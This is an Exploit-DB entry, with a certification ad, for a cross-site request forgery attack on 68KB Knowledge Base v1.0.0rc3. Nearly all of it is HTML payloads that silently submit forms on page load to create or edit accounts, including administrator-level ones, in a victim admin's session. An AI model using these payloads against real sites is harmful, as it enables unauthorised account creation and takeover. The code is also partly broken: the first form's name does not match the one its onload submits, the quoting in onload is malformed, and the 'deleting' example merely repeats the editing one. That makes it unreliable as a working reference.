68kb 68KB Base 1.0.0rc3 - Cross-Site Request Forgery (Admin)

EDB-ID:

12021

CVE:

N/A




Platform:

PHP

Date:

2010-04-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF
Date: 2010-04-02
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip
Version: v1.0.0rc3

<html>
<body onload="document.forms["edit"].submit()">
<form name="create" method="post" action="http://<server>/index.php/admin/users/add">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
</form>
</body>
</html>

Example of deleting an account:

<html>
<body onload="document.forms["edit"].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>

Example of editing:

<html>
<body onload="document.forms["edit"].submit()">
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">
<input type=hidden name="username" value="JohnDoe">
<input type=hidden name="email" value="email">
<input type=hidden name="level" value="1">
<input type=hidden name="password" value="password">
<input type=hidden name="passconf" value="password">
<input type=hidden name="id" value="1">
</form>
</body>
</html>